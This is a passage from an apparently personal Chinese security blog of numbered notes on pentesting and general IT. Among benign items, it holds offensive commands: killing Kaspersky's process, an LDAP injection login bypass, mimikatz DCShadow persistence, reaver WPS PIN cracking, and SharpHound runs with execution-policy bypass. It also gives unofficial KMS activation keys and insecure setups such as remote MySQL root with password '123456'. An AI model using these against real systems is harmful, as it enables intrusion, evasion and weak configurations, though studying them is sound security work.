/etc/group`命令可以查看linux机器中的用户组信息 `组名:密码:GID:该用户组中的用户列表`为文件格式,举例如下: ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 13] 参考文章:[linux /etc/group解析][linux _etc_group] # 59.卡巴斯基杀毒进程 # taskkill /f /im kavfswp.exe #结束进程 # 60. 组策略禁用命令提示符的绕过方式 # 1. 提权到system 2. aspx环境中使用setp命令 + 木马路径,例如setp C:\\inetpub\\wwwroot\\artifact.exe,然后随便输入几个字符即可。 参考文章:[ 组策略禁用命令提示符的绕过方式][Link 4] # 61. 如何删除-开头的文件 # 例如有一个文件叫做`--123.txt`,利用下面的命令即刻删除: rm -f ./--123.txt # 62. 水坑攻击与鱼叉攻击 # 水坑攻击:在受害者常访问的网站上挂马,引导受害者点击下载执行。 鱼叉攻击:有针对群体的钓鱼邮件。 # 63. c++连续创建两个int变量,两个变量地址相差不是4 # int变量会用4个字节存储,一个地址可以存储一个字节。理论上说连续创建两个int类型的数据,两个数据的地址应该相差4。但当我们用debug模式编译的时候,会发现相差可能是会很大,我这里相差是32。 这是因为debug编译的模式下,DEBUG 版为了在变量访问越界的时候做出检测,在变量之间插入了一些填固定值的内容,因此数据的地址会发生些许的变化。如果我们切换到release模式去进行编译,就会发现一切恢复了正常,两个int类型变量的地址相差就会变成4. [https://bbs.csdn.net/topics/390858311][https_bbs.csdn.net_topics_390858311] # 64. debug与release编译有什么区别 # Debug 通常称为调试版本,它包含调试信息,并且不作任何优化,便于程序员调试程序。Release 称为发布版本,它往往是进行了各种优化,使得程序在代码大小和运行速度上都是最优的,以便用户很好地使用。 debug编译处的exe可以被调试,而release编译出的无法被IDE直接调试。 # 65. 指针与句柄 # 指针就不说了,代表某个对象的地址。 句柄的话,是一个数字,32位系统上函数的句柄位32bit,也就是一个4字节大小的数字。64位系统上函数的句柄为64bit也就是8字节大小的数据。 句柄指向对象的地址,是对象地址的一种表现形式,句柄仅能用来访问对象,不能做任何指针相关的操作,例如指针地址的加减。 句柄一般情况下只在当前进程内有价值。 使用具柄是为了安全性。 # 66. 堆与栈 # 以c语言为例: int a =1; //在栈中申请的内存 int *b = new int; //在堆中申请内存 *b = 2; delete b; //释放在堆上申请的内存 栈的内存是连续的,地址由低到高被使用,数据先进后出,且内存使用后会自动释放。 堆到内存是随机的,需要手动释放内存。 # 67. c++中的引用 # int a = 1; int& b=a; a=3; //此时b也等于3 引用跟指针十分相似,上面代码可以理解成b指向a这个变量所存储的地址,b的值就等于\*a。 # 68. ((void(\*)())Memory)();的理解 # 首先我们需要知道: > (*(void(*)())0) () 等同 ((void(\*)())0) () ----原因函数是一种function-to-pointer的方式,&fun, fun, \*fun ,\*\*fun都是一样 Memory为含有我们写入的shellcode的内存的首地址。 void(\*)()是强制改变当前函数指针类型为返回值为void且无传入数据的函数指针类型。 (void(\*)())Memory就是将Memory变成一个返回值为void且无传入参数的指针类型。 ((void(\*)())Memory)()就是调用Memory指针所对应的函数,在c语言中就是执行Memory所对应地址的二进制代码,也就是我们那的shellcode。 # 69. 判断一个exe是不是32位 # 看他Machine字段是不是014c,如果是那就是32位的。 ![在这里插入图片描述][20210713150430728.png] ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 14] # 70. 主机账号每30天自动修改一次密码 # # 71. LDAP注入攻击 # 当前常用的ldap服务器有微软的ADAM和OpenLDAP。 如果是微软的那么暂时没办法攻击。 如果用的是OpenLDAP就可以进行注入攻击。举例如下: 假设一个用户输入账号密码的场景,应用构造一个过滤器发送给LDAP服务器进行查询: (&(username=uname)(password=pwd)) 这时候我们就可以通过构造如下的payload来绕过认证: (&(username=uname))(*)(password=pwd)) 只需要将输入的username改成`uname))(*`即可。因为OpenLDAP默认不会解析第二个过滤器,上面的payload有三个过滤器分别为: 1. (&(username=uname)) 2. (\*) 3. (password=pwd)) 但只有第一个会被成功执行,而且结果为永真。 # 72. 开发模型:瀑布模型、敏捷模型 # * 瀑布模型: ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 15] 将项目从头到尾分为不同的阶段,例如分为需求、设计、实施、验证、上线、维护这几个阶段,然后每个阶段结束后都会有十分详细的文档方便下个阶段的工作。管理人员仅通过文档就可以了解项目成型之后的模样,可以很好的对项目做宏观把控,十分适合成熟稳定的大项目。但是对于经常需要较大变动的项目,瀑布模式就十分不适合了。每次大的更改几乎都代表了项目得从头再来。 * 敏捷模型: ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 16] 相当于先生成一个具有核心功能的小产品,然后不停的迭代直到最终的成品出现。在每个迭代的过程中,都会有客户的参与,来决定这次迭代的细节与后续的方向,如果有问题及时改正。 这样做的好处有客户实时参与,跟有可能制作出让客户满意的产品;研发速度快,且每个阶段都有一个成品,更容易让客户确定研发进度与自己的需求,如果需求出现偏差可以及时改正,改错的代价也比较小; # 73. mac上wireshark抓包权限不够 # whoami cd /dev sudo chown shukasakai:admin bp* #用whoami的结果替换shukasakai # 74. 代码审计中的路由是什么意思 # url所对应的业务代码。 # 75. 使用git管理github上的仓库 # [https://blog.csdn.net/weixin\_41938903/article/details/103150430][https_blog.csdn.net_weixin_41938903_article_details_103150430] # 76. 禁止机器账户的密码自动更改 # reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v DisablePasswordChange /t REG_DWORD /d 1 /f # 77. win2012 standard激活 # slmgr /ipk XC9B7-NBPP2-83J2H-RHMBY-92BT4 slmgr /skms kms.03k.org slmgr /ato # 78. ACL、SACL、DACL、ACE、SDDL的区别 # ACL由SACL与DACL组成。 DACL:控制某个对象是否有能访问另一个对象,并控制权限细节例如读写执行等。 ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 17] SACL:控制某个对象试图访问另一个对象的时候产生的日志细节。 ACE:DACL与SACL中的每一条规则都是ACE。格式如下: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;(resource_attribute) `SDDL安全描述符定义语言`是一种语言格式,其中有两个函数,可以将安全描述符转化为字符串形式,并可以将符合格式的字符串转化为安全描述符,字符串形式的安全描述符举例如下: O:owner_sid #代表SID G:group_sid #代表GID D:dacl_flags(string_ace1)(string_ace2)... (string_acen) #代表DACL S:sacl_flags(string_ace1)(string_ace2)... (string_acen) #代表SACL ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 18] 参考文章: [ace字符串格式][ace] [sid字符串格式][sid] # 79. win10 激活 # 管理员权限的powershell slmgr /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX slmgr /skms kms.03k.org slmgr /ato # 80. 不使用wget与curl实现http请求 # exec 7<>/dev/tcp/www.baidu.com/80 #建立socket链接 echo -e 'GET / HTTP/1.0 \n' >& 7 #发起http请求 cat <&7 #获取相应 exec 7<& - #关闭socket链接 # 81. 程序执行逻辑 # 1. 在内存中展开被执行的exe,按照pe 头中规定的展开方式。 2. cpu中的控制器将内存中的数据读入cpu的寄存器中。 3. 执行。 > 32位cpu最多只能同时处理32位也就是4字节的数据。寻址范围是00000000到FFFFFFFF共4gb也就是2的32次方个地址,也就意味着最大只支持4gb的内存。 > 64位cpu最多能同时处理64位也就是8字节的数据。寻址范围是16个0到16个F。一共2的64次方个地址。最大支持4gb乘4gb大小的内存。 # 82. 关于多次loadlibrary一个dll文件 # 如果DLL被多次LoadLibrary,那么DllMain只执行一次,引用基数+1。 # 83. CVE-2018-8581 # exchage 的ssrf漏洞,原理如下: > 在漏洞版本下,Exchange允许任何用户把订阅推送到`指定的URL`,且注册表`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\DisableLoopbackCheck = 1`,它代表了exchange的net ntlm hash可以relay给exchange自己进行身份验证。 > exchange在推送订阅的时候使用的`自己system账号`进行身份验证的(前提是攻击者服务器返回给exchange一个401认证)。 > 攻击者可以利用这个ssrf漏洞将订阅目标设置为自己的服务器,令exchange去跟自己的服务器进行身份验证,然后攻击者可以实施中间人攻击代替exchange去跟其他机器进行身份验证,换句话说`攻击者此时就是exchange这台机器的system账号权限`。 # 84. python与java的默认安装路径 # MAC: > `java` > /Library/Java/JavaVirtualMachines/jdk-16.0.2.jdk/Contents/Home > `python` > /usr/local/Cellar/python@3.9 > 如果你用`dmg`安装了jre: > /Library/Internet\\ Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/bin/ > 检查版本: > /Library/Internet\\ Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/bin/Java -version windows: > `java` > C:\\Program Files\\Java\\jdk-16.0.2 > `python` > C:\\Users\[username\]\\AppData\\Local\\Programs\\Python\\Python39 # 85. 理解DCShadow # 攻击者将一台域内机器提升为域控角色,利用域控之间的数据同步推送,可更改其他用户在LDAP中的属性值,例如添加sidhistory。一般用作权限维持。 条件: 1. 需要域管理员的凭据。 利用过程: 1. 打开mimikatz,启动mimidrv服务,获取SYSTEM权限。 > mimikatz \# !+ > mimikatz \# !processtoken 1. 修改目标用户在ldap中的url属性 mimikatz # lsadump::dcshadow /object:fortest /attribute:url /value:test.dcshadow.com 3.新开一个mimikatz窗口,执行push,触发域控间数据同步过程 mimikatz # lsadump::dcshadow /push 参考文章: [揭秘DCShadow][DCShadow] # 86. 用户态切换到内核态 # 1. 系统调用,主动切换。 2. 异常,例如缺页异常。 3. 外部设备的中断信号。 # 87. 什么是CAS架构 # ![在这里插入图片描述][watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16] CAS架构一个实现SSO也就是单点登录的解决方案,具体结果就是一处登陆处处访问不需要二次登陆。具体逻辑如下: 1. 用户登录第一个网站的时候会输入自己的账号密码信息,第一个网站就是CAS客户端。 2. CAS客户端会将用户输入的凭据发送给CAS服务端,这个可能是LDAP服务器一类的认证服务器。然后如果用户通过认证则CAS服务端会发送一个ticket给CAS客户端也就是那个web应用,具体可能是添加一条加密的cookie。 3. CAS客户端将得到的ticket发送给服务端进行验证,如果通过则身份验证成功。 4. 如果这时候用户去访问别的需要登陆的web页面或者web服务,那么那个新的服务又会成为新的CAS客户端,将用户的加密的cookie发送给CAS服务端,如果认证通过则返回用户想访问的数据。 5. 以此类推。 # 88. zsh与插件的安装和基本配置 # wget https://github.com/robbyrussell/oh-my-zsh/raw/master/tools/install.sh -O - | sh git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting git clone https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions git clone https://github.com/Green-m/msfvenom-zsh-completion ~/.oh-my-zsh/custom/plugins/msfvenom/ echo 'export HOMEBREW_BOTTLE_DOMAIN=https://mirrors.ustc.edu.cn/homebrew-bottles' >> ~/.zshrc echo 'export PATH=$PATH:/opt/metasploit-framework/bin' >> ~/.zshrc zsh-syntax-highlighting zsh-autosuggestions msfvenom # 89. locate数据库更新 # 直接执行: > /usr/libexec/locate.updatedb 也可以将命令添加一个别名到环境变量中 alias updatedb=‘sudo /usr/libexec/locate.updatedb’ # 90. linux的history命令查询的是~/.bash\_history文件的内容(如果shell是bash的话) # # 91 .mac下python2无pip解决方案 # curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py sudo python2 get-pip.py # 92. 解决kali上root远程ssh无法登陆与root远程无法登陆kali的mysql # 1. root登陆ssh echo "PermitRootLogin yes" >>/etc/ssh/sshd_config service ssh restart 1. root远程登录mysql mysql -uroot -p use mysql; grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option; # flush privileges; exit vim /etc/mysql/mariadb.conf.d/50-server.cnf #注释掉bind-address service mysql restart [mariadb无法远程访问的解决思路][mariadb] # 93. kali上mysql忘记密码 # 参考文章:[MySQL root密码忘记,原来还有更优雅的解法!][MySQL root] ## 方法1 ## mysqld_safe --defaults-file=/etc/mysql/my.cnf --skip-grant-tables --skip-networking & alter user 'root'@'localhost' identified by '123456'; flush privileges; alter user 'root'@'localhost' identified by '123456'; ![在这里插入图片描述][watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 1] ## 方法2 ## vim init.sql alter user 'root'@'localhost' identified by '123456'; mysqld_safe --defaults-file=/etc/mysql/my.cnf --skip-grant-tables --skip-networking & service mysqld restart --init-file=/usr/local/mysql57/init.sql ***注意my.cnf文件的路径*** # 94. javascript的理解 # ## 客户端js ## 一般是写在网页上,客户访问到网页时浏览器会自动执行js代码,一般情况跟服务端没太多关系不会与服务端产生数据交互,主要负责前端的数据显示或者处理,与客户端进行交互。 ## 服务端js ## js也可以用来写服务端就像java一样。这时候就要用到node.js。Node.js 是一个基于Chrome JavaScript 运行时建立的一个平台。 Node.js是一个事件驱动I/O服务端JavaScript环境,基于Google的V8引擎,V8引擎执行Javascript的速度非常快,性能非常好。 # 95. VMware vSphere是什么 # vSphere 是 VMware 推出的虚拟化平台套件,其中最重要的组建是ESXI跟Vcenter server。 ## ESXi ## 可以理解成一个操作系统,可以直接装载在物理主机上,在这个操作系统中可以装很多歌windows/linux虚拟机。 ## Vcenter Server ## 管理esxi和esxi上运行的虚拟机。 # 96. Wi-Fi破解 # 条件:路由器有wps功能,因为一旦提供了这个功能,用户就可以通过pin码登录路由器。这个ping码只有11000种可能 ## 1.查看自己ID无线网卡 ## networksetup -listallhardwareports ![在这里插入图片描述][watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 2] ## 2. 监听wifi看是否开启WPS功能: ## `理论上只要WPS Loaked是No都可以破解。` sudo wlan -i en0 #用自己的无线网卡监听 ![在这里插入图片描述][watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 3] ## 3. 破解pin码 ## sudo reaver -i en0 -b 54:a7:03:08:99:66 -vv 红框内为密码 ![在这里插入图片描述][watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_11_color_FFFFFF_t_70_g_se_x_16] 如果知道了pin码后wifi被改了密码,我们可以试用下面的命令秒破wifi密码 reaver -i en0 -b MAC -p PIN码 -vv 参考文章: [macos中使用wifi破解][macos_wifi] [kali破解wifi密码][kali_wifi] # 97. 英文版mac系统如何将地图和日历设置为中文 # defaults write com.apple.iCal AppleLanguages '(zh-CN)' defaults write com.apple.Maps AppleLanguages '(zh-CN)' # 98.MAC上使用bloodhound # 1.安装neo4j:[https://neo4j.com/download-center/\#community][https_neo4j.com_download-center_community] 2.安装jdk11 [https://www.oracle.com/java/technologies/javase/jdk11-archive-downloads.html][https_www.oracle.com_java_technologies_javase_jdk11-archive-downloads.html] 3.登陆neo4j管理页面更改默认密码 [http://localhost:7474/browser/][http_localhost_7474_browser] 默认账号密码相同且都是neo4j 我这里更改成123 出现下面的页面即为更改成功 ![,][watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 4] 4.下载并启动bloodhound [https://github.com/BloodHoundAD/BloodHound/releases][https_github.com_BloodHoundAD_BloodHound_releases] ![在这里插入图片描述][watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 5] ![在这里插入图片描述][watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 6] ![在这里插入图片描述][watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 7] 5.将探测所用文件导入目标主机并执行 `执行后会在当前文件夹下生成.zip数据文件,将文件拖回bloodhound客户端的计算机进行数据分析。` \#powershell版本脚本 powershell -exec bypass -command "Import-Module ./SharpHound.ps1; Invoke-BloodHound -c all" \#exe版本脚本 SharpHound.exe -c all \#powershell版本azure脚本可手机Azure环境的数据 powershell Set-ExecutionPolicy Bypass -Scope Process Import-Module Az Import-Module AzureADPreview Connect-AzureAD Connect-AzAccount . .\AzureHound.ps1 Invoke-AzureHound 6.将.zip文件导入客户端进行数据分析 点击这个upload Data将.zip文件导入即可 ![在这里插入图片描述][watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_17_color_FFFFFF_t_70_g_se_x_16] 参考文章:[bloodhound官方手册][bloodhound] # 99. proxychains4配置文件位置 # /usr/local/etc/proxychains.conf # 100. chrome路径 # chrome://version ![在这里插入图片描述][watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 8] # 101. %00截断原理 # 系统会自动忽略0x00这个16进制数据后面的东西,而%00最终会被解析成0x00. [Windows_RID Hijacking]: https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E5%B8%90%E6%88%B7%E7%9A%84RID-Hijacking/ [20201117185009531.png_pic_center]: /images/20221120/f4c12e8dd9b544da8dcfbf28cacb8759.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70_pic_center]: https://img-blog.csdnimg.cn/20201117185501186.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70#pic_center [mimikatz]: https://www.freebuf.com/articles/web/176796.html [Mac_Homebrew]: https://www.jianshu.com/p/fdf7e316f096 [Mac OS X _ Homebrew]: https://www.jianshu.com/p/066b5d45fde6 [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]: https://img-blog.csdnimg.cn/20201208173040713.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [pip]: https://zhuanlan.zhihu.com/p/46975553 [2020122116043858.png]: https://img-blog.csdnimg.cn/2020122116043858.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]: https://img-blog.csdnimg.cn/20201221160325596.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]: https://img-blog.csdnimg.cn/20201221160505313.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [20210104171123922.png]: https://img-blog.csdnimg.cn/20210104171123922.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]: https://img-blog.csdnimg.cn/20210108123223465.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]: https://img-blog.csdnimg.cn/20210108122954631.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 5]: https://img-blog.csdnimg.cn/20210108122022651.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [JIRA]: https://cloud.tencent.com/developer/article/1528965 [1]: https://www.zhihu.com/question/35087138 [2]: http://www.ruanyifeng.com/blog/2017/07/iaas-paas-saas.html [Link 1]: https://security.tencent.com/index.php/blog/msg/150 [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 6]: https://img-blog.csdnimg.cn/20210204082840445.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 7]: https://img-blog.csdnimg.cn/20210204082806102.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [Link 2]: https://shanfenglan.blog.csdn.net/article/details/112194509 [MachineAccount_DCSync]: https://www.secrss.com/articles/25931 [PHP_CGI_CLI_FPM]: https://caihongtengxu.github.io/2018/20181012/index.html [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 8]: https://img-blog.csdnimg.cn/20210219111553780.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 9]: https://img-blog.csdnimg.cn/20210219111633968.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [XSD]: https://www.w3school.com.cn/schema/schema_howto.asp [build event]: https://mp.weixin.qq.com/s/w0W0_l2k-KNUG4EMYuK5ag [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 10]: https://img-blog.csdnimg.cn/20210302103555709.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [Link 3]: https://www.toutiao.com/i6881462700229329421 [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 11]: https://img-blog.csdnimg.cn/20210324162254126.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [JWT]: https://www.ruanyifeng.com/blog/2018/07/json_web_token-tutorial.html [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 12]: https://img-blog.csdnimg.cn/20210405150536863.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [XML DOM]: https://www.w3school.com.cn/xmldom/dom_http.asp [AJAX]: https://www.w3school.com.cn/ajax/ajax_xmlhttprequest_response.asp [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 13]: https://img-blog.csdnimg.cn/2021052415082486.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [linux _etc_group]: http://c.biancheng.net/view/841.html [Link 4]: https://mp.weixin.qq.com/s/7qVmVodGAWvl3_jxaGzRDA [https_bbs.csdn.net_topics_390858311]: https://bbs.csdn.net/topics/390858311 [20210713150430728.png]: https://img-blog.csdnimg.cn/20210713150430728.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 14]: https://img-blog.csdnimg.cn/20210713150535938.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 15]: https://img-blog.csdnimg.cn/20210720110153224.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 16]: https://img-blog.csdnimg.cn/2021072011014397.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [https_blog.csdn.net_weixin_41938903_article_details_103150430]: https://blog.csdn.net/weixin_41938903/article/details/103150430 [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 17]: https://img-blog.csdnimg.cn/29c137c81afb49b8a191e0676d2aa1a4.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 18]: https://img-blog.csdnimg.cn/27cf51ad41e140feb1dd9b029b4d74c3.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw,size_16,color_FFFFFF,t_70 [ace]: https://docs.microsoft.com/zh-cn/windows/win32/secauthz/ace-strings [sid]: https://docs.microsoft.com/zh-cn/windows/win32/secauthz/sid-strings [DCShadow]: https://blog.riskivy.com/dcshadow/ [watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16]: 